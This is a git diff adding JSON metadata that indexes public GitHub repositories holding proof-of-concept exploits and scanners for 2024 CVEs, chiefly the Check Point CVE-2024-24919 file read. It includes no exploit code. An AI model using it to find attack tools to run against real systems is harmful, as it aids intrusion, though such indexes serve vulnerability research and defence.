"forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809932050, + "name": "CVE-2024-24919", + "full_name": "GuayoyoCyber\/CVE-2024-24919", + "owner": { + "login": "GuayoyoCyber", + "id": 17362318, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17362318?v=4", + "html_url": "https:\/\/github.com\/GuayoyoCyber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GuayoyoCyber\/CVE-2024-24919", + "description": "Nmap script to check vulnerability CVE-2024-24919", + "fork": false, + "created_at": "2024-06-03T18:17:45Z", + "updated_at": "2024-11-06T12:30:51Z", + "pushed_at": "2024-06-04T01:38:40Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-24919", + "nmap", + "nmap-scripts" + ], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 810087759, + "name": "CVE-2024-24919", + "full_name": "0xans\/CVE-2024-24919", + "owner": { + "login": "0xans", + "id": 151745138, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151745138?v=4", + "html_url": "https:\/\/github.com\/0xans", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xans\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-06-04T02:53:22Z", + "updated_at": "2024-07-01T17:39:46Z", + "pushed_at": "2024-06-19T16:59:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 810112875, + "name": "CVE-2024-24919", + "full_name": "Tim-Hoekstra\/CVE-2024-24919", + "owner": { + "login": "Tim-Hoekstra", + "id": 135951177, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/135951177?v=4", + "html_url": "https:\/\/github.com\/Tim-Hoekstra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Tim-Hoekstra\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-06-04T04:29:35Z", + "updated_at": "2024-06-04T04:58:59Z", + "pushed_at": "2024-06-04T04:58:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811447878, + "name": "CVE-2024-24919-POC", + "full_name": "starlox0\/CVE-2024-24919-POC", + "owner": { + "login": "starlox0", + "id": 144545235, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144545235?v=4", + "html_url": "https:\/\/github.com\/starlox0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/starlox0\/CVE-2024-24919-POC", + "description": "A Simple Exploit Code(POC) to Automate CVE-2024–24919", + "fork": false, + "created_at": "2024-06-06T16:03:35Z", + "updated_at": "2024-06-06T16:15:06Z", + "pushed_at": "2024-06-06T16:12:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811842021, + "name": "CVE-2024-24919-Exploit", + "full_name": "nullcult\/CVE-2024-24919-Exploit", + "owner": { + "login": "nullcult", + "id": 63312212, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63312212?v=4", + "html_url": "https:\/\/github.com\/nullcult", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nullcult\/CVE-2024-24919-Exploit", + "description": "CVE-2024-24919 exploit that checks more files for better visibility", + "fork": false, + "created_at": "2024-06-07T12:14:19Z", + "updated_at": "2024-06-07T12:25:37Z", + "pushed_at": "2024-06-07T12:25:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812235899, + "name": "cve-2024-24919", + "full_name": "satchhacker\/cve-2024-24919", + "owner": { + "login": "satchhacker", + "id": 171741472, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171741472?v=4", + "html_url": "https:\/\/github.com\/satchhacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/satchhacker\/cve-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-06-08T10:17:00Z", + "updated_at": "2024-06-08T10:26:37Z", + "pushed_at": "2024-06-08T10:26:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812532137, + "name": "CVE-2024-24919", + "full_name": "verylazytech\/CVE-2024-24919", + "owner": { + "login": "verylazytech", + "id": 172168670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172168670?v=4", + "html_url": "https:\/\/github.com\/verylazytech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/verylazytech\/CVE-2024-24919", + "description": "POC - CVE-2024–24919 - Check Point Security Gateways", + "fork": false, + "created_at": "2024-06-09T06:54:51Z", + "updated_at": "2024-12-30T21:06:51Z", + "pushed_at": "2024-11-26T14:45:44Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "check-point", + "cve-2024-24919", + "information-disclosure", + "poc-cve-2024-24919" + ], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812836186, + "name": "CVE-2024-24919", + "full_name": "protonnegativo\/CVE-2024-24919", + "owner": { + "login": "protonnegativo", + "id": 64793570, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64793570?v=4", + "html_url": "https:\/\/github.com\/protonnegativo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/protonnegativo\/CVE-2024-24919", + "description": "Python script to automate the process of finding vulnerable sites for CVE-2024-24919.", + "fork": false, + "created_at": "2024-06-10T01:29:19Z", + "updated_at": "2024-10-29T13:25:51Z", + "pushed_at": "2024-06-10T01:40:02Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-24919", + "cve-2024-24919-poc", + "python", + "security", + "security-automation", + "security-tools" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 813414695, + "name": "CVE-2024-24919", + "full_name": "SalehLardhi\/CVE-2024-24919", + "owner": { + "login": "SalehLardhi", + "id": 77610128, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77610128?v=4", + "html_url": "https:\/\/github.com\/SalehLardhi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SalehLardhi\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-06-11T03:33:30Z", + "updated_at": "2024-06-11T03:43:24Z", + "pushed_at": "2024-06-11T03:37:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 828696142, + "name": "CVE-2024-24919", + "full_name": "ShadowByte1\/CVE-2024-24919", + "owner": { + "login": "ShadowByte1", + "id": 155693555, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155693555?v=4", + "html_url": "https:\/\/github.com\/ShadowByte1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShadowByte1\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-07-14T23:26:51Z", + "updated_at": "2024-07-14T23:33:02Z", + "pushed_at": "2024-07-14T23:33:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 831985405, + "name": "CVE-2024-24919", + "full_name": "H3KEY\/CVE-2024-24919", + "owner": { + "login": "H3KEY", + "id": 176267746, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176267746?v=4", + "html_url": "https:\/\/github.com\/H3KEY", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/H3KEY\/CVE-2024-24919", + "description": "Hello everyone, I am sharing a modified script from CVE-2024-24919 which can extract paths categorized as critical.", + "fork": false, + "created_at": "2024-07-22T06:04:13Z", + "updated_at": "2024-07-22T06:07:47Z", + "pushed_at": "2024-07-22T06:07:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 834172359, + "name": "cve-2024-24919", + "full_name": "Jutrm\/cve-2024-24919", + "owner": { + "login": "Jutrm", + "id": 84643295, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84643295?v=4", + "html_url": "https:\/\/github.com\/Jutrm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jutrm\/cve-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-07-26T15:17:58Z", + "updated_at": "2024-07-26T15:23:05Z", + "pushed_at": "2024-07-26T15:23:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 849356755, + "name": "Arbitrary-File-Read-CVE-2024-24919", + "full_name": "LuisMateo1\/Arbitrary-File-Read-CVE-2024-24919", + "owner": { + "login": "LuisMateo1", + "id": 172660352, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172660352?v=4", + "html_url": "https:\/\/github.com\/LuisMateo1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LuisMateo1\/Arbitrary-File-Read-CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-08-29T12:59:40Z", + "updated_at": "2024-08-29T14:37:35Z", + "pushed_at": "2024-08-29T14:37:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 850398760, + "name": "Event-ID-263-Rule-Name-SOC287---Arbitrary-File-Read-on-Checkpoint-Security-Gateway-CVE-2024-24919-", + "full_name": "AhmedMansour93\/Event-ID-263-Rule-Name-SOC287---Arbitrary-File-Read-on-Checkpoint-Security-Gateway-CVE-2024-24919-", + "owner": { + "login": "AhmedMansour93", + "id": 179945455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179945455?v=4", + "html_url": "https:\/\/github.com\/AhmedMansour93", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AhmedMansour93\/Event-ID-263-Rule-Name-SOC287---Arbitrary-File-Read-on-Checkpoint-Security-Gateway-CVE-2024-24919-", + "description": "🔍 Just wrapped up an incident report on a Phishing Alert (Event ID 257, SOC282). Enhancing my expertise in email threat detection and response! 🚨 #Cybersecurity #SOCAnalyst #LetsDefend", + "fork": false, + "created_at": "2024-08-31T16:57:06Z", + "updated_at": "2024-08-31T16:58:23Z", + "pushed_at": "2024-08-31T16:58:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 864811586, + "name": "CVE-2024-24919", + "full_name": "geniuszly\/CVE-2024-24919", + "owner": { + "login": "geniuszly", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszly\/CVE-2024-24919", + "description": "PoC script for CVE-2024-24919 vulnerability. It scans a list of target URLs to identify security issues by sending HTTP POST requests and analyzing server responses", + "fork": false, + "created_at": "2024-09-29T08:20:56Z", + "updated_at": "2024-10-06T16:40:54Z", + "pushed_at": "2024-09-29T08:24:06Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "buffer-overflow", + "cve", + "cve-2024-24919", + "cybersecurity", + "ethical-hacking", + "exploit", + "exploit-development", + "linux", + "overflow", + "penetration-testing", + "poc", + "security", + "vulnerability", + "vulnerability-research" + ], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 870254088, + "name": "CVE-2024-24919", + "full_name": "skyrowalker\/CVE-2024-24919", + "owner": { + "login": "skyrowalker", + "id": 156471538, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156471538?v=4", + "html_url": "https:\/\/github.com\/skyrowalker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skyrowalker\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-10-09T17:54:28Z", + "updated_at": "2024-10-11T00:53:35Z", + "pushed_at": "2024-10-10T13:34:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 879969031, + "name": "CVE-2024-24919_POC", + "full_name": "sar-3mar\/CVE-2024-24919_POC", + "owner": { + "login": "sar-3mar", + "id": 105809777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105809777?v=4", + "html_url": "https:\/\/github.com\/sar-3mar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sar-3mar\/CVE-2024-24919_POC", + "description": "It's Proof of Concept on CVE-2024-24919-POC , i made it after it's discoverd ", + "fork": false, + "created_at": "2024-10-28T21:54:41Z", + "updated_at": "2024-10-28T22:08:32Z", + "pushed_at": "2024-10-28T22:08:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 906477862, + "name": "Check-Point_poc", + "full_name": "NingXin2002\/Check-Point_poc", + "owner": { + "login": "NingXin2002", + "id": 138864342, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/138864342?v=4", + "html_url": "https:\/\/github.com\/NingXin2002", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NingXin2002\/Check-Point_poc", + "description": "Check-Point安全网关任意文件读取漏洞(CVE-2024-24919)", + "fork": false, + "created_at": "2024-12-21T02:42:10Z", + "updated_at": "2024-12-26T16:21:11Z", + "pushed_at": "2024-12-21T02:43:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24926.json b/2024/CVE-2024-24926.json new file mode 100644 index 0000000000..b18a21e8e8 --- /dev/null +++ b/2024/CVE-2024-24926.json @@ -0,0 +1,33 @@ +[ + { + "id": 901496601, + "name": "CVE-2024-24926", + "full_name": "moften\/CVE-2024-24926", + "owner": { + "login": "moften", + "id": 4262359, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4262359?v=4", + "html_url": "https:\/\/github.com\/moften", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/moften\/CVE-2024-24926", + "description": "Vulnerabilidad CVE-2024-24926 afecta al tema Brooklyn de WordPress", + "fork": false, + "created_at": "2024-12-10T19:08:03Z", + "updated_at": "2024-12-11T16:39:06Z", + "pushed_at": "2024-12-11T16:39:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25092.json b/2024/CVE-2024-25092.json new file mode 100644 index 0000000000..dd637fd607 --- /dev/null +++ b/2024/CVE-2024-25092.json @@ -0,0 +1,33 @@ +[ + { + "id": 757380747, + "name": "CVE-2024-25092", + "full_name": "RandomRobbieBF\/CVE-2024-25092", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-25092", + "description": "NextMove Lite < 2.18.0 - Subscriber+ Arbitrary Plugin Installation\/Activation", + "fork": false, + "created_at": "2024-02-14T11:30:59Z", + "updated_at": "2024-07-11T16:39:09Z", + "pushed_at": "2024-02-14T11:32:33Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25153.json b/2024/CVE-2024-25153.json new file mode 100644 index 0000000000..447faf87dc --- /dev/null +++ b/2024/CVE-2024-25153.json @@ -0,0 +1,64 @@ +[ + { + "id": 771098779, + "name": "CVE-2024-25153", + "full_name": "nettitude\/CVE-2024-25153", + "owner": { + "login": "nettitude", + "id": 11998401, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11998401?v=4", + "html_url": "https:\/\/github.com\/nettitude", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nettitude\/CVE-2024-25153", + "description": "Proof-of-concept exploit for CVE-2024-25153.", + "fork": false, + "created_at": "2024-03-12T17:26:10Z", + "updated_at": "2024-11-20T16:30:42Z", + "pushed_at": "2024-03-13T09:46:07Z", + "stargazers_count": 42, + "watchers_count": 42, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 42, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 773709929, + "name": "CVE-2024-25153", + "full_name": "rainbowhatrkn\/CVE-2024-25153", + "owner": { + "login": "rainbowhatrkn", + "id": 147452376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/147452376?v=4", + "html_url": "https:\/\/github.com\/rainbowhatrkn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rainbowhatrkn\/CVE-2024-25153", + "description": "Proof-of-concept exploit for CVE-2024-25153.", + "fork": false, + "created_at": "2024-03-18T09:02:56Z", + "updated_at": "2024-03-18T09:03:33Z", + "pushed_at": "2024-03-18T09:09:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25169.json b/2024/CVE-2024-25169.json new file mode 100644 index 0000000000..220aea1828 --- /dev/null +++ b/2024/CVE-2024-25169.json @@ -0,0 +1,33 @@ +[ + { + "id": 763046588, + "name": "CVE-2024-25169-Mezzanine-v6.0.0", + "full_name": "shenhav12\/CVE-2024-25169-Mezzanine-v6.0.0", + "owner": { + "login": "shenhav12", + "id": 93703363, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93703363?v=4", + "html_url": "https:\/\/github.com\/shenhav12", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shenhav12\/CVE-2024-25169-Mezzanine-v6.0.0", + "description": null, + "fork": false, + "created_at": "2024-02-25T12:21:40Z", + "updated_at": "2024-02-25T12:27:53Z", + "pushed_at": "2024-02-25T12:34:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25170.json b/2024/CVE-2024-25170.json new file mode 100644 index 0000000000..c3689b79b8 --- /dev/null +++ b/2024/CVE-2024-25170.json @@ -0,0 +1,33 @@ +[ + { + "id": 763048747, + "name": "CVE-2024-25170-Mezzanine-v6.0.0", + "full_name": "shenhav12\/CVE-2024-25170-Mezzanine-v6.0.0", + "owner": { + "login": "shenhav12", + "id": 93703363, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93703363?v=4", + "html_url": "https:\/\/github.com\/shenhav12", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shenhav12\/CVE-2024-25170-Mezzanine-v6.0.0", + "description": null, + "fork": false, + "created_at": "2024-02-25T12:28:49Z", + "updated_at": "2024-02-25T12:28:50Z", + "pushed_at": "2024-02-25T12:31:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25175.json b/2024/CVE-2024-25175.json new file mode 100644 index 0000000000..b9db7f4ccd --- /dev/null +++ b/2024/CVE-2024-25175.json @@ -0,0 +1,33 @@ +[ + { + "id": 775961541, + "name": "CVE-2024-25175", + "full_name": "jet-pentest\/CVE-2024-25175", + "owner": { + "login": "jet-pentest", + "id": 71512502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4", + "html_url": "https:\/\/github.com\/jet-pentest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2024-25175", + "description": null, + "fork": false, + "created_at": "2024-03-22T11:54:36Z", + "updated_at": "2024-03-22T11:54:36Z", + "pushed_at": "2024-03-22T12:01:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25202.json b/2024/CVE-2024-25202.json new file mode 100644 index 0000000000..55b0354df3 --- /dev/null +++ b/2024/CVE-2024-25202.json @@ -0,0 +1,33 @@ +[ + { + "id": 760675412, + "name": "CVE-2024-25202", + "full_name": "Agampreet-Singh\/CVE-2024-25202", + "owner": { + "login": "Agampreet-Singh", + "id": 73707055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73707055?v=4", + "html_url": "https:\/\/github.com\/Agampreet-Singh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Agampreet-Singh\/CVE-2024-25202", + "description": "A vulnerability was found in PHPgurukul visitor management system 1.0. it has been rated as problemic. Affected by the issue is some unknown functionality of the file search bar that called search-result.php and search-visitor.php . The vulnerability is Cross-Site-Scripting (XSS).", + "fork": false, + "created_at": "2024-02-20T18:19:53Z", + "updated_at": "2024-02-23T04:18:48Z", + "pushed_at": "2024-03-02T12:27:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25227.json b/2024/CVE-2024-25227.json new file mode 100644 index 0000000000..6704370368 --- /dev/null +++ b/2024/CVE-2024-25227.json @@ -0,0 +1,64 @@ +[ + { + "id": 762376764, + "name": "ABO.CMS-Login-SQLi-CVE-2024-25227", + "full_name": "thetrueartist\/ABO.CMS-Login-SQLi-CVE-2024-25227", + "owner": { + "login": "thetrueartist", + "id": 47917137, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47917137?v=4", + "html_url": "https:\/\/github.com\/thetrueartist", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thetrueartist\/ABO.CMS-Login-SQLi-CVE-2024-25227", + "description": null, + "fork": false, + "created_at": "2024-02-23T16:46:54Z", + "updated_at": "2024-03-13T19:47:28Z", + "pushed_at": "2024-03-13T19:43:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 771661416, + "name": "ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227", + "full_name": "thetrueartist\/ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227", + "owner": { + "login": "thetrueartist", + "id": 47917137, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47917137?v=4", + "html_url": "https:\/\/github.com\/thetrueartist", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thetrueartist\/ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227", + "description": null, + "fork": false, + "created_at": "2024-03-13T17:58:41Z", + "updated_at": "2024-03-13T19:48:07Z", + "pushed_at": "2024-03-22T17:01:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25277.json b/2024/CVE-2024-25277.json new file mode 100644 index 0000000000..b7db59e33b --- /dev/null +++ b/2024/CVE-2024-25277.json @@ -0,0 +1,33 @@ +[ + { + "id": 763137888, + "name": "CVE-2024-25277", + "full_name": "maen08\/CVE-2024-25277", + "owner": { + "login": "maen08", + "id": 48031010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48031010?v=4", + "html_url": "https:\/\/github.com\/maen08", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maen08\/CVE-2024-25277", + "description": "Resources and PoCs", + "fork": false, + "created_at": "2024-02-25T16:54:33Z", + "updated_at": "2024-04-23T19:11:25Z", + "pushed_at": "2024-04-23T19:11:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25278.json b/2024/CVE-2024-25278.json new file mode 100644 index 0000000000..0ab2a18a03 --- /dev/null +++ b/2024/CVE-2024-25278.json @@ -0,0 +1,33 @@ +[ + { + "id": 758896821, + "name": "CVE-2024-25278", + "full_name": "sajaljat\/CVE-2024-25278", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2024-25278", + "description": null, + "fork": false, + "created_at": "2024-02-17T11:59:51Z", + "updated_at": "2024-02-17T11:59:51Z", + "pushed_at": "2024-02-17T12:08:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25279.json b/2024/CVE-2024-25279.json new file mode 100644 index 0000000000..1fffac9264 --- /dev/null +++ b/2024/CVE-2024-25279.json @@ -0,0 +1,33 @@ +[ + { + "id": 758899753, + "name": "CVE-2024-25279", + "full_name": "sajaljat\/CVE-2024-25279", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2024-25279", + "description": "(XSS)", + "fork": false, + "created_at": 